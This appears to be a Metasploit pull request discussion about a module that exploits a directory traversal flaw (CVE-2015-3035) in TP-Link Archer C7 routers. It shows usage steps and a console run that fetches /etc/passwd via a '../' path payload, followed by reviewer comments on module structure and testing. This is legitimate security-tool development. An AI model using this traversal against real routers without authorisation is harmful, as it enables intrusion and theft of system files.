Archer c7 traversal

[rad10]

Vulnerable Application

This module attempts to spider files from an archer c7 router using a known traversal vulnerability

Verification Steps

1. use auxiliary/scanner/http/archer_c7_traversal
2. set RHOSTS <addr>
3. set FILE <file>
4. run

Scenarios

Archer C7

msf6 > use auxiliary/scanner/http/archer_c7_traversal
msf6 auxiliary(scanner/http/archer_c7_traversal) > set rhosts 192.168.0.1
rhosts => 192.168.0.1
msf6 auxiliary(scanner/http/archer_c7_traversal) > run
[*] Grabbing data at /login/../../../etc/passwd
[+] /etc/passwd retrieved
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux Usermmm:/root:/bin/sh
admin:x:500:500:admin:/home:/bin/sh
guest:x:500:500:guest:/home:/bin/sh
root:x:0:0:root:/root:/bin/sh
admin:x:500:500:admin:/tmp/dropbear:/bin/sh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[bwatters-r7]

Is there a firmware version?

[rad10]

After scouring and searching my old data, I found the version and firmware tested on. C7_V1_141204_US

[bwatters-r7]

Since this gets the file, perhaps it would make more sense as a gather module?

[rad10]

I had no idea there was even a gather section until now. I was mostly modeling off of other traversal modules and scanners like dirb. I'm not sure if it belongs with them or in the gather bucket since it can easily go either way.

[cdelafuente-r7]

I second @bwatters-r7 on this. Scanner modules are usually used to find and report on a vulnerability, not to exploit them. I understand many scanner modules in Metasploit are not following this rule, but this is the direction we would like to take. If a module gathers information by exploiting a vulnerability, a gather module is the best option. This kind of module can have a check and an exploit methods. The former can be used as a simple scanner to check if the host is vulnerable and the latter actually exploit the vulnerability to gather the data.

Note that RHOSTS option is very flexible and can be used to run both methods against multiple targets without the need of a scanner module. You can, for example, uses CIDR syntax or get the list of targets from a local file using file:// prefix.

[cdelafuente-r7]

So, after reading the next comment, I realize you might not have the actual device to test. This will be a problem if you radically change the module structure, like I suggested just above. With that in mind, it might be better to keep the scanner module implementation as it is right now, or we won't be able to accept it. I suppose this has been throughly tested when you had access to the router. That said, if you have HTTP traces or/and PCAP you recorded at this time, that would be helpful for us.

[rad10]

I do actually. I have a pcap of the exploit taken ahead of time
archerc7traversal.pcapng.gz

I also have been attempting to gain access to the router that I used, but I'm unsure if its bricked or not. If I am to test it, it would be a while.

[bwatters-r7]

It would be nice to have a check method; it does not need to be major, but something to verify we're talking to a router that looks to be the right version/model.

[rad10]

So... this module was developed last fall for a grad project. The router that was testing with was being loaned for the semester, and I cannot find the firmware description to save my life. So I wont be able to add a check or a version finder if I wanted. The check in this case is if it produces a file or a 404 sadly.

[cdelafuente-r7]

Thanks @rad10 for your contribution. I reviewed the PCAP and everything looks good to me. I'll go ahead and land it.

[cdelafuente-r7]

Release Notes

This adds a scanner module that gather a specific file by leveraging a directory traversal vulnerability in TP-LINK Archer c7 routers. This vulnerability is identified as CVE-2015-3035.